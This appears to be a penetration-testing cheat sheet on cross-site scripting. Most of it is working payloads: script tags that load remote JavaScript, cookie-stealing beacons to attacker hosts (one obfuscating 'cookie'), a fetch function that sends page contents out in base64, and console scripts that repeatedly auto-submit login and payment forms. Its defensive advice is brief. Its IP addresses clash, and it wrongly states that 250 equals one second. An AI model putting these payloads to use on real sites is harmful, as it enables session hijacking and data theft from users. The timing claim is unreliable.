Client Side Attacks
XSS
Professional Explanation of Payload
1
<script src="http://192.168.155.224:80/test.txt"></script>
1
<script>var i=new Image();i.src="http://192.168.155.224:80/?c="+document["coo"+"kie"]</script>
Step-by-Step Breakdown
1. Payload Nature
This is a client-side injection payload, specifically JavaScript, typically used in:
Stored XSS (Cross-Site Scripting)
Reflected XSS
DOM-based XSS
Its goal is to force the vulnerable application to import and execute external JavaScript code controlled by the attacker.
2. Component Analysis
| Component | Description |
|---|---|
<script src="..."></script> | Loads external JavaScript from a specified URL. |
http://10.21.86.228:80/test.txt | Attacker-controlled server hosting test.txt. |
.txt extension is irrelevant for browsers | If the content is valid JavaScript, the browser will execute it regardless of file extension. |
Note: Despite being named .txt, if the server returns JavaScript with the correct Content-Type or valid syntax, browsers will execute it.
3. Real-World Application
Exploitation Context:
If an application reflects unsanitized user input into HTML/JavaScript, this payload will:
Establish an out-of-band (OOB) connection to
10.21.86.228.Download and execute any JavaScript hosted in
test.txt.
Common in CTFs, Red Team operations, bug bounty, or penetration tests to:
Exfiltrate cookies or session tokens.
Manipulate DOM elements.
Deploy keyloggers or redirect victims.
Escalate from Stored/Reflected XSS to full session hijacking or command execution.
1
2
3
4
5
6
7
async function exfil() {
const response = await fetch('/');
const text = await response.text();
await fetch(`http://<kali ip>/?data=${btoa(text)}`);
}
exfil();
4. Security Implications
If this executes:
Indicates XSS vulnerability, enabling:
Theft of cookies, JWT tokens, CSRF tokens.
Unauthorized actions on behalf of the victim.
Browser exploitation via advanced payloads.
If the vulnerable system is internal and the attacker’s IP (10.21.86.228) is reachable:
Facilitates internal network pivoting.
Allows payload staging for lateral movement.
5. Additional Payload Variations
| Payload Example | Purpose |
|---|---|
<script src="http://attacker.com/payload.js"></script> | Load remote JavaScript |
<img src=x onerror="location='http://attacker.com/?c='+document.cookie"> | Exfiltrate cookies |
<script>fetch('http://attacker.com?'+document.cookie)</script> | Direct data exfiltration via fetch |
<iframe src="http://attacker.com"></iframe> | Hidden malicious iframe injection |
Conclusion
This payload is a textbook example of leveraging external script inclusion for malicious purposes during XSS exploitation. It’s essential for defenders to implement:
Proper output encoding.
CSP (Content Security Policy) restrictions.
Strict input validation.
For attackers, this is an efficient, low-resource method to escalate client-side vulnerabilities into actionable control over victim sessions or browsers.
Extra
Directly from the console if there is no any validation to check if they received any post or not you can try this on browser’s console:
1
2
3
4
5
6
7
function submitForm(){
if (document.getElementById('scroll-form')) {
document.getElementById('email').value = mail@mail.tz;
document.getElementById('logInBtn').click();
}
}
setInterval(submitForm, 250)
Ó
1
2
3
4
5
6
7
8
9
10
11
12
13
14
function submitForm(){
// Rellenar el campo oculto del token (aunque normalmente lo genera el sistema)
const tokenField = document.getElementById('token');
if (tokenField) {
tokenField.value = 'tok_1234567890abcdef'; // Token inventado
}
// Enviar el formulario
const form = document.getElementById('payment_form');
if (form) {
form.submit();
}
}
setInterval(submitForm, 250)
250 = 1 sec but you can change at the interval you want to.